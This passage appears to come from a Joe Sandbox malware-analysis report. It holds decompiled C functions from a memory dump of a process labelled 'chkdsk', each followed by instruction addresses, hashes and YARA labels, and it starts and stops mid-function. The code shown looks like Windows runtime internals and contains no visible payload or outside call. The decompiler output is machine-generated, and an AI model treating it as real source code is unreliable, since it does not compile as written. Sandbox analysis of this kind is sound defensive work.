											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                      0x04d98a0a
                                                      0x04d98a1c
                                                      0x04d98a23
                                                      0x04d98a2e
                                                      0x04d98a30
                                                      0x04d98a36
                                                      0x04d98a3c
                                                      0x04d98a3e
                                                      0x04d98a4a
                                                      0x04d98a52
                                                      0x04d98a9c
                                                      0x04d98aae
                                                      0x04d98a58
                                                      0x04d98a5e
                                                      0x04d98a6a
                                                      0x04d98a6f
                                                      0x04d98a75
                                                      0x04d98a7d
                                                      0x04d98a85
                                                      0x04d98a86
                                                      0x04d98a89
                                                      0x04d98a93
                                                      0x04d98a99
                                                      0x04d98a9b
                                                      0x00000000
                                                      0x04d98aaf
                                                      0x04d98abe
                                                      0x04d98ac3
                                                      0x04d98acb
                                                      0x04d98ad7
                                                      0x04d98ae0
                                                      0x04d98af1
                                                      0x00000000
                                                      0x04d98af1
                                                      0x04d98acd
                                                      0x04d98ad5
                                                      0x04d98afb
                                                      0x04d98afd
                                                      0x04d98aff
                                                      0x04d98b07
                                                      0x04d98b22
                                                      0x04d98b24
                                                      0x04d98b2a
                                                      0x04d98b2e
                                                      0x04d98b3f
                                                      0x04d98b78
                                                      0x04d98b41
                                                      0x04d98b52
                                                      0x04d98b54
                                                      0x04d98b5c
                                                      0x04d98b74
                                                      0x04d98b74
                                                      0x04d98b5c
                                                      0x04d98b3f
                                                      0x04d98b5e
                                                      0x04d98b61
                                                      0x04d98b64
                                                      0x04d98b64
                                                      0x04d98b6c
                                                      0x04d98b6c
                                                      0x04d98b11
                                                      0x04de9cd5
                                                      0x04de9cd5
                                                      0x04d98b17
                                                      0x04d98b1a
                                                      0x04d98b1a
                                                      0x00000000
                                                      0x04d98ad5
                                                      0x04d98a89

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8f8ffda7166005bc2c34774786eaf5d7df6784d6452539ba76de5b25c601fdd7
                                                      • Instruction ID: 0556ef2404872fccddd0c23a9b94fb537830a833288d8f80a734bd61676904f0
                                                      • Opcode Fuzzy Hash: 8f8ffda7166005bc2c34774786eaf5d7df6784d6452539ba76de5b25c601fdd7
                                                      • Instruction Fuzzy Hash: 0E415EB1A402289BDF24EF55C888AAAB3F4FF55704F1445EAE819D7241E770EE80DF60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E4AA16 Relevance: .1, Instructions: 120COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04E4AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E04E4ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E04E4AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E04E4AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E04E2CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L04DA77F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E04DA7D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E04E4131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E04E2CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                                                      0x04e4aa1f
                                                      0x04e4aa21
                                                      0x04e4aa23
                                                      0x04e4aa2b
                                                      0x04e4aa30
                                                      0x04e4aa36
                                                      0x04e4aa39
                                                      0x04e4aa42
                                                      0x04e4aa75
                                                      0x04e4aa7a
                                                      0x04e4aa7c
                                                      0x04e4aa7c
                                                      0x04e4aa88
                                                      0x04e4aa8a
                                                      0x04e4aa8f
                                                      0x04e4ab02
                                                      0x04e4ab04
                                                      0x04e4aa99
                                                      0x04e4aaa8
                                                      0x04e4aaaf
                                                      0x04e4aab3
                                                      0x04e4aacc
                                                      0x04e4aad1
                                                      0x04e4aad6
                                                      0x04e4aae0
                                                      0x04e4aaf3
                                                      0x04e4aaf9
                                                      0x04e4aafe
                                                      0x04e4aafe
                                                      0x04e4aaf3
                                                      0x04e4aad6
                                                      0x04e4aab3
                                                      0x04e4ab07
                                                      0x04e4ab0a
                                                      0x04e4ab11
                                                      0x04e4ab23
                                                      0x04e4ab13
                                                      0x04e4ab1c
                                                      0x04e4ab1c
                                                      0x04e4ab2b
                                                      0x04e4ab44
                                                      0x04e4ab44
                                                      0x04e4ab51
                                                      0x04e4ab51
                                                      0x04e4aa44
                                                      0x04e4aa47
                                                      0x04e4aa4c
                                                      0x00000000
                                                      0x00000000
                                                      0x04e4aa5a
                                                      0x04e4aa64
                                                      0x04e4aa72
                                                      0x00000000
                                                      0x04e4aa66
                                                      0x04e4aa66
                                                      0x04e4aa68
                                                      0x04e4aa6a
                                                      0x00000000
                                                      0x04e4aa6a

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                      • Instruction ID: 8f4578334bdf63f1af70257e2d26c1a24141ae469b4a07dcadeb39d3f6de51fc
                                                      • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                      • Instruction Fuzzy Hash: 0131F332B402446BEB158B65D845BBFF7ABEFC4324F199079E805A7291EA74ED00C650
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E4FDE2 Relevance: .1, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E04E4FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E04E4FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E04E50A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E04DA7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E04E41608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E04E52B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E04E4C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E04E4DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E04DA7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E04E4A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                                      0x04e4fde7
                                                      0x04e4fde8
                                                      0x04e4fdec
                                                      0x04e4fdee
                                                      0x04e4fdf5
                                                      0x04e4fdf7
                                                      0x04e4fdfc
                                                      0x04e4fe19
                                                      0x04e4fe22
                                                      0x04e4fe26
                                                      0x04e4fec6
                                                      0x04e4fecd
                                                      0x04e4fed5
                                                      0x04e4fee7
                                                      0x04e4fed7
                                                      0x04e4fee0
                                                      0x04e4fee0
                                                      0x04e4feef
                                                      0x04e4ff00
                                                      0x04e4ff02
                                                      0x04e4ff07
                                                      0x04e4ff07
                                                      0x00000000
                                                      0x04e4feef
                                                      0x04e4fe33
                                                      0x04e4fe55
                                                      0x04e4fe59
                                                      0x04e4fe5b
                                                      0x04e4fe5e
                                                      0x04e4fe69
                                                      0x04e4fe6d
                                                      0x04e4fe6d
                                                      0x04e4fe69
                                                      0x04e4fe35
                                                      0x04e4fe41
                                                      0x04e4fe41
                                                      0x04e4fe79
                                                      0x04e4fe8b
                                                      0x04e4fe7b
                                                      0x04e4fe84
                                                      0x04e4fe84
                                                      0x04e4fe93
                                                      0x00000000
                                                      0x04e4fea8
                                                      0x04e4feba
                                                      0x00000000
                                                      0x04e4feba
                                                      0x04e4fdfe
                                                      0x04e4fe01
                                                      0x04e4fe02
                                                      0x04e4fe08
                                                      0x04e4ff0c
                                                      0x04e4ff14
                                                      0x04e4ff14

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                      • Instruction ID: e1f816be753cd4dc42e4159dc4a1d602f1c2d18c1ae41f04b26df77ae3e64aae
                                                      • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                      • Instruction Fuzzy Hash: F9310932700640AFE722DB68D844F6ABBE9EBC5B65F185459E8458B342EA74FD41C720
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E4EA55 Relevance: .1, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 70%
                                                      			E04E4EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E04DA2280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E04E4E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E04D8F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E04D9FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E04E4AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E04E4BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E04DA7D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E04E3FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E04D9FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E04E4A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                                      0x04e4ea55
                                                      0x04e4ea66
                                                      0x04e4ea68
                                                      0x04e4ea6c
                                                      0x04e4ea6f
                                                      0x04e4ea72
                                                      0x04e4ea75
                                                      0x04e4ea7a
                                                      0x04e4ea7a
                                                      0x04e4ea7e
                                                      0x04e4ea80
                                                      0x04e4ea85
                                                      0x04e4ea8b
                                                      0x04e4eab5
                                                      0x04e4eabc
                                                      0x04e4eabf
                                                      0x04e4eabf
                                                      0x04e4eaca
                                                      0x04e4eace
                                                      0x04e4ead0
                                                      0x04e4eae4
                                                      0x04e4eaeb
                                                      0x04e4eaf0
                                                      0x04e4eaf5
                                                      0x04e4eb09
                                                      0x04e4eb0d
                                                      0x04e4eb1d
                                                      0x04e4eb2d
                                                      0x04e4eb38
                                                      0x04e4eb3d
                                                      0x04e4eb41
                                                      0x04e4eb4a
                                                      0x04e4eb60
                                                      0x04e4eb4c
                                                      0x04e4eb52
                                                      0x04e4eb59
                                                      0x04e4eb59
                                                      0x04e4eb68
                                                      0x04e4eb71
                                                      0x04e4eb71
                                                      0x04e4ea8d
                                                      0x04e4ea8f
                                                      0x04e4ea92
                                                      0x04e4ea97
                                                      0x04e4ea97
                                                      0x04e4ea9b
                                                      0x04e4ea9c
                                                      0x04e4ea9e
                                                      0x04e4eaa6
                                                      0x04e4eaa6
                                                      0x04e4eb7e

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                      • Instruction ID: e0b65bf6daff402d9e133acadafb346795b1c8d8911a470fd477cfad1991c956
                                                      • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                      • Instruction Fuzzy Hash: 5231A1726047059BD729DF28D880A6BB7A9FBC4314F04592EE59687680EF30F809CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E069A6 Relevance: .1, Instructions: 108COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 69%
                                                      			E04E069A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x4e7d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L04D96C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E04E06BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E04DC9980() >= 0) {
							E04DA2280(_t56, 0x4e78778);
							_t77 = 1;
							_t68 = 1;
							if( *0x4e78774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x4e78774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E04D8B6F0(0x4d6c338, 0x4d6c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E04DC9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E04DC95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E04D9FFB0(_t68, _t77, 0x4e78778);
				}
				_pop(_t78);
				return E04DCB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                      0x04e069b5
                                                      0x04e069be
                                                      0x04e069c3
                                                      0x04e069c9
                                                      0x04e069cc
                                                      0x04e069d1
                                                      0x04e069d3
                                                      0x04e069de
                                                      0x04e069e1
                                                      0x04e069ea
                                                      0x04e069f6
                                                      0x04e069fe
                                                      0x04e06a13
                                                      0x04e06a14
                                                      0x04e06a15
                                                      0x04e06a16
                                                      0x04e06a1e
                                                      0x04e06a26
                                                      0x04e06a31
                                                      0x04e06a36
                                                      0x04e06a37
                                                      0x04e06a40
                                                      0x04e06a49
                                                      0x04e06a4a
                                                      0x04e06a53
                                                      0x04e06a59
                                                      0x04e06a5d
                                                      0x04e06a5e
                                                      0x04e06a64
                                                      0x04e06a67
                                                      0x04e06a6a
                                                      0x04e06a6d
                                                      0x04e06a70
                                                      0x04e06a77
                                                      0x04e06a7d
                                                      0x04e06a86
                                                      0x04e06a89
                                                      0x04e06a9c
                                                      0x04e06a9f
                                                      0x04e06aa2
                                                      0x04e06aa5
                                                      0x04e06aaf
                                                      0x04e06ab1
                                                      0x04e06ab8
                                                      0x04e06ab9
                                                      0x04e06abb
                                                      0x04e06abe
                                                      0x04e06ac5
                                                      0x04e06ac5
                                                      0x04e06aaf
                                                      0x04e06a40
                                                      0x04e06a26
                                                      0x04e069fe
                                                      0x04e06ace
                                                      0x04e06ad0
                                                      0x04e06ad3
                                                      0x04e06ad8
                                                      0x04e06adf
                                                      0x04e06adf
                                                      0x04e06ae8
                                                      0x04e06aef
                                                      0x04e06aef
                                                      0x04e06af9
                                                      0x04e06b06

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eb7b800de1444ac84d14a2e5a99b05bb3140ab6357b50918f9d961965669091a
                                                      • Instruction ID: 41bfa5be873de15d590202ada9af5da49d0ecc403fce4eede91a97d62861ddd4
                                                      • Opcode Fuzzy Hash: eb7b800de1444ac84d14a2e5a99b05bb3140ab6357b50918f9d961965669091a
                                                      • Instruction Fuzzy Hash: AC417CB1E00208AFDB24DFA5D940BFEBBF4EF48718F04812AE855A7290DB74A955CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D85210 Relevance: .1, Instructions: 107COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 85%
                                                      			E04D85210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E04D852A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E04DC95D0();
							L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E04D9EB70(_t54, 0x4e779a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E04DC95D0();
								L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E04D9EB70(_t54, 0x4e779a0);
						}
						return _t52;
					}
					L5:
					_t33 = E04DCF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E04D9EB70(_t54, 0x4e779a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E04DC95D0();
							L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                      0x04d85220
                                                      0x04d85224
                                                      0x04de0d13
                                                      0x04de0d16
                                                      0x04de0d19
                                                      0x04d8522a
                                                      0x04d8522a
                                                      0x04d8522d
                                                      0x04d8522d
                                                      0x04d85231
                                                      0x04d85235
                                                      0x04d85239
                                                      0x04de0d5c
                                                      0x04de0d62
                                                      0x00000000
                                                      0x00000000
                                                      0x04de0d6a
                                                      0x04de0d7b
                                                      0x04de0d7f
                                                      0x04de0d81
                                                      0x04de0d84
                                                      0x04de0d95
                                                      0x04de0d95
                                                      0x04de0d6c
                                                      0x04de0d71
                                                      0x04de0d71
                                                      0x04de0d9a
                                                      0x00000000
                                                      0x04d8524a
                                                      0x04d8524a
                                                      0x04d85250
                                                      0x04de0d24
                                                      0x04de0d35
                                                      0x04de0d39
                                                      0x04de0d3b
                                                      0x04de0d3e
                                                      0x04de0d50
                                                      0x04de0d50
                                                      0x04de0d26
                                                      0x04de0d2b
                                                      0x04de0d2b
                                                      0x00000000
                                                      0x04de0d55
                                                      0x04d85256
                                                      0x04d8525b
                                                      0x04d85265
                                                      0x04de0da7
                                                      0x04d8526b
                                                      0x04d8526e
                                                      0x04d85272
                                                      0x04de0db1
                                                      0x04de0db4
                                                      0x04de0dc5
                                                      0x04de0dc5
                                                      0x04d85272
                                                      0x04d85278
                                                      0x04d8527e
                                                      0x04d8528a
                                                      0x04d8528c
                                                      0x04d8528d
                                                      0x00000000
                                                      0x04d85280
                                                      0x04d85282
                                                      0x04d85288
                                                      0x04d8529f
                                                      0x04d85292
                                                      0x00000000
                                                      0x04d85292
                                                      0x00000000
                                                      0x04d85288
                                                      0x04d8527e

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1d22f95970b1bb9699920bf41b3034b74c2f757cca0526b7b1825bcf381348e3
                                                      • Instruction ID: 066187dc4fd9a6a7b278d990d21ee843e60073cbcaa2db1e4b80f1e998d8dc16
                                                      • Opcode Fuzzy Hash: 1d22f95970b1bb9699920bf41b3034b74c2f757cca0526b7b1825bcf381348e3
                                                      • Instruction Fuzzy Hash: 3931E331351621EBDB26BF29D990F7677A5FF10764F11461DE8594B9A0EBB0F800CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DC3D43 Relevance: .1, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04DC3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E04D97B60(0, _t61, 0x4d611c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E04D97B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
